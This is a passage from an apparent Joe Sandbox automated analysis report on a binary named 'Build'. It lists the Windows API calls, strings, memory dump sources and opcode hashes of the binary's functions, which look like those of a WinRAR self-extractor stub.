                                                                                          • GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
                                                                                          • GetLastError.KERNEL32 ref: 00368CF6
                                                                                          • CloseHandle.KERNEL32(?), ref: 00368D05
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentErrorHandleLastProcess
                                                                                          • String ID: @8$J8$^8
                                                                                          • API String ID: 1009092642-1335377171
                                                                                          • Opcode ID: 24f35f343e44df23129054cc257c48705f08b571e9123adac1ec0bd924131d80
                                                                                          • Instruction ID: d2bf5b8d7a1842da49529c7bcd7e2fa68571ff255240502bc65bbf2dda36a45a
                                                                                          • Opcode Fuzzy Hash: 24f35f343e44df23129054cc257c48705f08b571e9123adac1ec0bd924131d80
                                                                                          • Instruction Fuzzy Hash: C50100B0601219AFDB129FA5DC8AEFFBBBCEB19344F404419F901E2190DA319D45DB70
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00380B46,00380AA9,00380D4A), ref: 00380AE2
                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00380AF8
                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00380B0D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                          • API String ID: 667068680-1718035505
                                                                                          • Opcode ID: ad6363a5f88c5ceff05ca92b49bbb9c54def48a984b7fc01d3e427cce930162c
                                                                                          • Instruction ID: 4e427cf1998d32546a9c6ab9cf74c707d21ef1df81c12a823393f5c21e830bdf
                                                                                          • Opcode Fuzzy Hash: ad6363a5f88c5ceff05ca92b49bbb9c54def48a984b7fc01d3e427cce930162c
                                                                                          • Instruction Fuzzy Hash: 7EF0C8317567215B4FBBBFB45C8A96B22CC9A8235533304BAD502D3240E691DCC9D3E0
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00374192
                                                                                          • _wcslen.LIBCMT ref: 003741A3
                                                                                          • _wcslen.LIBCMT ref: 003741B3
                                                                                          • _wcslen.LIBCMT ref: 003741C1
                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036D2D3,?,?,00000000,?,?,?), ref: 003741DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CompareString
                                                                                          • String ID: <
                                                                                          • API String ID: 3397213944-4251816714
                                                                                          • Opcode ID: 360752da15d7661dcbe3594c55a0692d9a7d9db0ad145c4c47b51e2192266fac
                                                                                          • Instruction ID: ed5775490849edcc388a66d59875d15754382d63a31db9dea560eafd6c798f98
                                                                                          • Opcode Fuzzy Hash: 360752da15d7661dcbe3594c55a0692d9a7d9db0ad145c4c47b51e2192266fac
                                                                                          • Instruction Fuzzy Hash: DFF01D32148154BFCF232F51EC0AD8E3F26EB90770B91C455F6195F061CB32A59597D0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0038B17E
                                                                                            • Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
                                                                                            • Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22
                                                                                          • _free.LIBCMT ref: 0038B190
                                                                                          • _free.LIBCMT ref: 0038B1A3
                                                                                          • _free.LIBCMT ref: 0038B1B4
                                                                                          • _free.LIBCMT ref: 0038B1C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID: p,:
                                                                                          • API String ID: 776569668-1418527582
                                                                                          • Opcode ID: ca9ecfe2eb129e38c036fcccb47e98c5a43e144c1c8f418dae247d69d1f9b3c9
                                                                                          • Instruction ID: 93f145af9edf9944378fa845535fe944f578e5b23b5f7ce10cace4b372b3b5f8
                                                                                          • Opcode Fuzzy Hash: ca9ecfe2eb129e38c036fcccb47e98c5a43e144c1c8f418dae247d69d1f9b3c9
                                                                                          • Instruction Fuzzy Hash: 60F0BD708107129BC647BB19EC02C89B769FB15725B01494AF4169A361CF7A58418F90
                                                                                          APIs
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 003735E6
                                                                                            • Part of subcall function 0036D076: GetVersionExW.KERNEL32(?), ref: 0036D0A7
                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037360A
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00373624
                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00373637
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00373647
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00373657
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2092733347-0
                                                                                          • Opcode ID: ac0b4dd22e21bcd79be2bac3c9c512bb2aa1075d509081f79a2d3b4fa2926ed2
                                                                                          • Instruction ID: 8c1bf464ba0faf564e78642e2bfb293422e552ee6943de7f5eacade4d7edaca0
                                                                                          • Opcode Fuzzy Hash: ac0b4dd22e21bcd79be2bac3c9c512bb2aa1075d509081f79a2d3b4fa2926ed2
                                                                                          • Instruction Fuzzy Hash: 9F4138761083059BCB05DFA8C88599BB7ECFF98704F04891EF999C7220E730D909CBA6
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00385111,00384ECC,003821B4), ref: 00385128
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00385136
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0038514F
                                                                                          • SetLastError.KERNEL32(00000000,00385111,00384ECC,003821B4), ref: 003851A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: dac8ffcc4f575c7bf17fb061da9d8db45e7d88be2609c43e37dd02dac11dd4f2
                                                                                          • Instruction ID: 17757db1afe6b142ad823bae1f1d4829f1025d308035ab1e966846933e9486c7
                                                                                          • Opcode Fuzzy Hash: dac8ffcc4f575c7bf17fb061da9d8db45e7d88be2609c43e37dd02dac11dd4f2
                                                                                          • Instruction Fuzzy Hash: A201D436219B116EEA2737B8BC8B7372A5CEB02771FB113AAF110896E1EF524C509744
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
                                                                                          • _free.LIBCMT ref: 0038B9DC
                                                                                          • _free.LIBCMT ref: 0038BA04
                                                                                          • SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA11
                                                                                          • SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
                                                                                          • _abort.LIBCMT ref: 0038BA23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 1522da3d324606cfb9f737eb31f980b46e1bd792926a7f5bce609f65aa3327f3
                                                                                          • Instruction ID: 588cc631dbf3367daa175c70005b057d091b82a496fa368dee6995272d3a6af5
                                                                                          • Opcode Fuzzy Hash: 1522da3d324606cfb9f737eb31f980b46e1bd792926a7f5bce609f65aa3327f3
                                                                                          • Instruction Fuzzy Hash: 91F0C836105B0367C61B7339AC4BF6B662D9FC2770F250195FA16EA3D2EF668C058354
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00380059
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00380073
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00380084
                                                                                          • TranslateMessage.USER32(?), ref: 0038008E
                                                                                          • DispatchMessageW.USER32(?), ref: 00380098
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 003800A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 2148572870-0
                                                                                          • Opcode ID: d59dbc2ac84977b30543834648a90e786ae4957745c80254eaf6790dac64ab45
                                                                                          • Instruction ID: 4c8573645634d072c2272085af77c2c6d3c1e746fa4eafbdf7f5214ae7726fb9
                                                                                          • Opcode Fuzzy Hash: d59dbc2ac84977b30543834648a90e786ae4957745c80254eaf6790dac64ab45
                                                                                          • Instruction Fuzzy Hash: A9F0FF72A05229BBCB226BA5EC4DEDF7F6DEF42751F008011F94AD2050D675D546CBA0
                                                                                          APIs
                                                                                          • EndDialog.USER32(?,00000001), ref: 0037D57B
                                                                                          • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0037D591
                                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 0037D5B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$Dialog
                                                                                          • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                          • API String ID: 1770891597-1315819833
                                                                                          • Opcode ID: 669796cc5935e00a46c5e550653fd58ba0ca3831a86349ce7fe1de37eba3bdf8
                                                                                          • Instruction ID: cca16272b666bffa0b3e226cf506fbdcd01aabf08a8421239ec42266727e057a
                                                                                          • Opcode Fuzzy Hash: 669796cc5935e00a46c5e550653fd58ba0ca3831a86349ce7fe1de37eba3bdf8
                                                                                          • Instruction Fuzzy Hash: FD41B3B2504208ABEB32AB64DC45FFE77BCEF49714F108429FA09E7181DB74A9448B65
                                                                                          APIs
                                                                                            • Part of subcall function 00372663: _wcslen.LIBCMT ref: 00372669
                                                                                            • Part of subcall function 0036D848: _wcsrchr.LIBVCRUNTIME ref: 0036D85F
                                                                                          • _wcslen.LIBCMT ref: 0036E105
                                                                                          • _wcslen.LIBCMT ref: 0036E14D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_wcsrchr
                                                                                          • String ID: .exe$.rar$.sfx
                                                                                          • API String ID: 3513545583-31770016
                                                                                          • Opcode ID: 1a249c016e801f3aea817c49dc70c5409b41e3d9b25e65e301cab15482cdab9d
                                                                                          • Instruction ID: 1af911a5f66c43eec8f760471f598b2845ea387226ace93fddcf1e0bea5a2e35
                                                                                          • Opcode Fuzzy Hash: 1a249c016e801f3aea817c49dc70c5409b41e3d9b25e65e301cab15482cdab9d
                                                                                          • Instruction Fuzzy Hash: 4B41322A50071199CB33AF35C846A7BB7A8EF42744B12C90EF9869B088E7A49D89D355
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0036DA59
                                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036BD19,?,?,00000800,?,?,?,0036BCD4), ref: 0036DB02
                                                                                          • _wcslen.LIBCMT ref: 0036DB70
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$CurrentDirectory
                                                                                          • String ID: UNC$\\?\
                                                                                          • API String ID: 3341907918-253988292
                                                                                          • Opcode ID: cc8472bb2482e5da0c33c1b90f78a353b3829d8e7bf919c39b29e946a98766d4
                                                                                          • Instruction ID: ba5886d4be9bd87db0eb563ee2a41df5e4b2ef8ae62f02b2b9004cecbeb6bdfd
                                                                                          • Opcode Fuzzy Hash: cc8472bb2482e5da0c33c1b90f78a353b3829d8e7bf919c39b29e946a98766d4
                                                                                          • Instruction Fuzzy Hash: EC419231E043416ACA33AF608D82DFF73BCAF55740F02885AF98897149EBE49945D662
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: %8
                                                                                          • API String ID: 176396367-940007118
                                                                                          • Opcode ID: afd77ca6aff1449ffc187af1dc324875165073d9448be5d2bf479ba5458ba055
                                                                                          • Instruction ID: 6aab79adba2c5cf489d48a3fc31b1f9c7e2e7af0430a5c9bdc6e85d11c47935d
                                                                                          • Opcode Fuzzy Hash: afd77ca6aff1449ffc187af1dc324875165073d9448be5d2bf479ba5458ba055
                                                                                          • Instruction Fuzzy Hash: 6241D2B15047519BC322EF38C94599FBBE8FF85300F05492DF989D7250DB30E9058B96
                                                                                          APIs
                                                                                          • LoadBitmapW.USER32(00000065), ref: 0037D9ED
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0037DA12
                                                                                          • DeleteObject.GDI32(00000000), ref: 0037DA44
                                                                                          • DeleteObject.GDI32(00000000), ref: 0037DA67
                                                                                            • Part of subcall function 0037C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0037DA3D,00000066), ref: 0037C665
                                                                                            • Part of subcall function 0037C652: SizeofResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C67C
                                                                                            • Part of subcall function 0037C652: LoadResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C693
                                                                                            • Part of subcall function 0037C652: LockResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C6A2
                                                                                            • Part of subcall function 0037C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6BD
                                                                                            • Part of subcall function 0037C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6CE
                                                                                            • Part of subcall function 0037C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037C737
                                                                                            • Part of subcall function 0037C652: GlobalUnlock.KERNEL32(00000000), ref: 0037C756
                                                                                            • Part of subcall function 0037C652: GlobalFree.KERNEL32(00000000), ref: 0037C75D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                          • String ID: ]
                                                                                          • API String ID: 1428510222-3352871620
                                                                                          • Opcode ID: 4a95b16afe982f17f785f71114ebf5942db90b4617fa2c76b441441147e61f62
                                                                                          • Instruction ID: 26e43e807130df82abc94c5805e8c6514bb4989d93f9b3617157885a78883009
                                                                                          • Opcode Fuzzy Hash: 4a95b16afe982f17f785f71114ebf5942db90b4617fa2c76b441441147e61f62
                                                                                          • Instruction Fuzzy Hash: 4F01C43250461166C73367655C05A7F7A7EAF82761F194118BC0CEB291DF799C058BA0
                                                                                          APIs
                                                                                            • Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                            • Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          • EndDialog.USER32(?,00000001), ref: 0037F99B
                                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037F9B1
                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037F9C5
                                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 0037F9D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
